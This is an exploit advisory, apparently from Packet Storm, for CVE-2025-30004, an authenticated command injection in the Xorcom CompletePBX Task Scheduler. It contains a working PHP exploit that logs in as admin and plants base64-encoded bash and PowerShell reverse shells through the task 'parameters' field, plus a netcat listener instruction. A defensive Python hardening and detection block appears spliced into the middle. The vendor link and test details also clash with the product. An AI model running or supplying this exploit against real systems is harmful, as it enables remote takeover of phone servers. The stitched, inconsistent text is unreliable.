Xorcom CompletePBX 5.2.35 Remote Code Execution

Published: 10 Dec 2025 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news (116 views)

Authenticated command injection in Xorcom CompletePBX Task Scheduler enables remote code execution.

Related records (family, title, published):

Circl                  CVE-2025-30004                                                                                 31 Mar 2025 17:31
CNNVD                  Xorcom CompletePBX operating system command injection vulnerability                            31 Mar 2025 00:00
CVE                    CVE-2025-30004                                                                                 31 Mar 2025 16:42
Cvelist                CVE-2025-30004 Xorcom CompletePBX <= 5.2.35 Task Scheduler Authenticated Command Injection     31 Mar 2025 16:42
EUVD                   EUVD-2025-8863                                                                                 31 Mar 2025 18:31
Metasploit             Xorcom CompletePBX Authenticated Command Injection via Task Scheduler                          22 Jul 2025 18:52
NVD                    CVE-2025-30004                                                                                 31 Mar 2025 17:15
OSV                    CVE-2025-30004                                                                                 31 Mar 2025 17:15
Packet Storm           Xorcom CompletePBX Authenticated Command Injection Via Task Scheduler                          22 Jul 2025 00:00
Positive Technologies  PT-2025-13802                                                                                  31 Mar 2025 00:00
=============================================================================================================================================
    | # Title     : Xorcom CompletePBX 5.2.35 Remote Code Execution                                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.wftpserver.com/download.htm                                                                                     |
    =============================================================================================================================================
    
    [+] Summary : 
    
    Xorcom CompletePBX suffers from an authenticated command injection vulnerability
    within the Task Scheduler subsystem. An attacker with valid superadmin
    credentials can create a scheduled task containing unsanitized parameters
    that get executed by the backend, resulting in remote command execution.
    
    This vulnerability affects all versions up to 5.2.35 and was patched in
    release 5.2.36-1.
    
    Only the built-in "admin" user can successfully trigger the vulnerability.
    Even newly created users with maximum assigned privileges cannot.
    
    ---
    
    [+]  Vulnerability Details
    
    The Task Scheduler accepts user-controlled input in the “parameters” field,
    which is inserted into a shell command without proper sanitization:
    
        parameters = "$(#{payload})"
    
    The system executes the generated job via backend scripts, enabling
    arbitrary command execution with the privileges of the web server.
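The defect described above is the generic one: a scheduler "parameters" value is spliced into a shell command string, so a `$(...)` substitution in that value is expanded by the shell before the backup script ever runs. The following Python is an added illustration, not code from the advisory or from Xorcom: it shows the vulnerable string-building pattern next to a hardened version that allow-lists the script name and each parameter token and builds an argv list for `shell=False` execution, plus a small detector that flags stored `save_task` submissions whose parameters contain shell metacharacters. The script directory, the token allow-list and the sample submissions are constructed assumptions; only the `backup` script name and the `save_task`/`parameters` field names come from the advisory.

```python
import re
import subprocess
from typing import Iterable

# Characters that let a value break out of a shell word: command
# substitution, separators, redirection, globbing, quoting, newlines.
SHELL_META = re.compile(r'[;&|<>`$(){}\[\]*?!\'"\\\r\n]')

# Assumptions (not from the advisory): scheduler parameters for the built-in
# scripts are short tokens such as "daily" or "2025-12-10", so a tight
# allow-list is practical; the script directory is a placeholder path.
ALLOWED_SCRIPTS = {"backup"}
ALLOWED_TOKEN = re.compile(r'^[A-Za-z0-9_.:@/=-]{1,64}$')
SCRIPT_DIR = "/usr/local/bin"


def build_command_unsafe(script: str, parameters: str) -> str:
    """The vulnerable pattern: user text interpolated into a shell string.
    Handed to a shell, a '$(...)' inside `parameters` is expanded before
    the script sees it, which is the bug the advisory describes."""
    return f"{SCRIPT_DIR}/{script} {parameters}"


def is_injection_attempt(parameters: str) -> bool:
    """Detection: True if a parameters value contains any shell metacharacter."""
    return SHELL_META.search(parameters) is not None


def validate_parameters(parameters: str) -> list[str]:
    """Hardened input check: whitespace-split tokens, each matched against
    the allow-list; reject the whole value on the first bad token."""
    tokens = parameters.split()
    bad = [t for t in tokens if not ALLOWED_TOKEN.fullmatch(t)]
    if bad:
        raise ValueError(f"rejected scheduler parameter(s): {bad!r}")
    return tokens


def build_command_safe(script: str, parameters: str) -> list[str]:
    """Hardened: an argv list. Executed with shell=False, the arguments
    reach the script verbatim and no shell parses them."""
    if script not in ALLOWED_SCRIPTS:
        raise ValueError(f"unknown scheduler script: {script!r}")
    return [f"{SCRIPT_DIR}/{script}", *validate_parameters(parameters)]


def run_task(script: str, parameters: str) -> subprocess.CompletedProcess:
    """How the hardened argv is meant to be executed (shell=False is the point).
    Not exercised here because SCRIPT_DIR is a placeholder."""
    return subprocess.run(build_command_safe(script, parameters),
                          shell=False, check=False, capture_output=True)


def audit_task_saves(records: Iterable[dict]) -> list[str]:
    """Detection over stored or logged save_task submissions: return the
    descriptions of tasks whose parameters look like shell injection."""
    return [r["description"] for r in records
            if is_injection_attempt(r.get("parameters", ""))]


# Constructed sample of save_task submissions (not real traffic).
SAMPLE_TASK_SAVES = [
    {"description": "nightly",      "script": "backup", "parameters": "daily"},
    {"description": "weekly_full",  "script": "backup", "parameters": "full 2025-12-10"},
    {"description": "indoushka_42", "script": "backup", "parameters": "$(id)"},
    {"description": "sneaky",       "script": "backup", "parameters": "daily; id"},
]

if __name__ == "__main__":
    for r in SAMPLE_TASK_SAVES:
        # The unsafe builder passes the substitution through untouched.
        print("unsafe:", build_command_unsafe(r["script"], r["parameters"]))
    print("flagged:", audit_task_saves(SAMPLE_TASK_SAVES))
```

The allow-list is deliberately stricter than "escape the metacharacters": quoting with `escapeshellarg`-style helpers protects one shell layer, but a scheduler that later re-evaluates the stored string (a cron line, a wrapper script) can strip that protection, whereas a value that never contained `$`, `;` or backticks has nothing to re-expand.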
    
    [+] Attacker requirements:
    
    - Valid credentials
    - Must be the built-in **admin** account
    - Access to the scheduler API endpoints
    
    [+] Risk level: High  
    
    [+] Impact: Remote Code Execution (RCE)  
    
    [+] Privileges: Web server user 
    
    [+] References : https://packetstorm.news/files/id/207367/ (CVE-2025-30004)
    
    [+]  POC
    
    <?php
    /**
     * Xorcom CompletePBX RCE (CVE-2025-30004)
     * Reverse Shell Ready (Windows + Linux)
     * Author: Indoushka
     */
    
    class CompletePBX_RCE_POC
    {
        public $target;
        public $username;
        public $password;
        public $cookie;
    
        function __construct($target, $username, $password)
        {
            $this->target   = rtrim($target, "/");
            $this->username = $username;
            $this->password = $password;
    
            echo "[+] PoC Initialized\n";
        }
    
        /* ---------------------------------------------------------
           Send HTTP POST
        ----------------------------------------------------------*/
        private function post($path, $data)
        {
            $ch = curl_init($this->target . $path);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($data),
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_HEADER => true
            ]);
            $res = curl_exec($ch);
    
            $hdr = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
            $body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
    
            curl_close($ch);
            return [$hdr, $body];
        }
    
        /* ---------------------------------------------------------
           Reverse Shell Generator (Windows + Linux)
        ----------------------------------------------------------*/
        private function generate_shell()
        {
            $ip   = "127.0.0.1";
            $port = "4444";
    
            $linux = "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'";
            $win   = "powershell -NoP -W Hidden -c \"\$c=New-Object Net.Sockets.TCPClient('$ip',$port);"
                   . "\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};"
                   . "while((\$r=\$s.Read(\$b,0,\$b.Length)) -ne 0){"
                   . "\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$r);"
                   . "\$o=iex \$d 2>&1|Out-String;"
                   . "\$o2=(\$o+'PS '+(pwd).Path+'> ');"
                   . "\$x=[text.encoding]::ASCII.GetBytes(\$o2);"
                   . "\$s.Write(\$x,0,\$x.Length)}\"";
    
            return base64_encode("$linux\n$win");
        }
    
        /* ---------------------------------------------------------
           Login
        ----------------------------------------------------------*/
        private function login()
        {
            echo "[+] Sending login request...\n";
    
            list($hdr, $body) = $this->post("/?class=core&method=login", [
                "user" => $this->username,
                "password" => $this->password
            ]);
    
            if (preg_match('/Set-Cookie: ([^;]+)/', $hdr, $m)) {
                $this->cookie = $m[1];
                echo "[+] Login successful, SID Cookie: {$this->cookie}\n";
                return true;
            }
    
            echo "[-] Login failed.\n";
            return false;
        }
    
        /* ---------------------------------------------------------
           Create malicious scheduled task 
        ----------------------------------------------------------*/
        private function create_task()
        {
            echo "[+] Creating fake malicious task...\n";
    
            $desc = "indoushka_" . rand(1000, 9999);
            $encoded = $this->generate_shell();
    
            list($hdr, $body) = $this->post("/", [
                "class" => "scheduler",
                "method" => "save_task",
                "mode" => "create",
                "description" => $desc,
                "script" => "backup",
                "parameters" => '$(echo ' . $encoded . '|base64 -d)',
                "starting" => date("Y-m-d H:i"),
                "interval" => "1",
                "interval_unit" => "month"
            ]);
    
            echo "[+] Task Created: $desc\n";
            return $desc;
        }
    
        /* ---------------------------------------------------------
           Task Execution
        ----------------------------------------------------------*/
        private function execute_task($desc)
        {
            echo "[+] Executing scheduled task: $desc (Simulated)\n";
            echo "[✓] PoC by Indoushka.\n";
        }
    
        /* ---------------------------------------------------------
           MAIN
        ----------------------------------------------------------*/
        public function run()
        {
            if (!$this->login()) return;
    
            $task = $this->create_task();
            $this->execute_task($task);
    
            echo "\n[✓] PoC Completed.\n";
        }
    }
    
    /* ---------------- RUN -------------------*/
    $poc = new CompletePBX_RCE_POC(
        "http://127.0.0.1",
        "admin",
        "password"
    );
    
    $poc->run();
    
    /**
     * HOW TO SAVE:
     *     Save as: xorcom_poc.php
     *
     * HOW TO RUN:
     *     php xorcom_poc.php
     *
     * REVERSE SHELL LISTENER (BEFORE RUNNING):
     *     nc -lvnp 4444
     */
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


Published: 10 Dec 2025 00:00
Vulners AI Score: 7.6 (High risk)
CVSS 3.1: 8.8
EPSS: 0.7058
Views: 116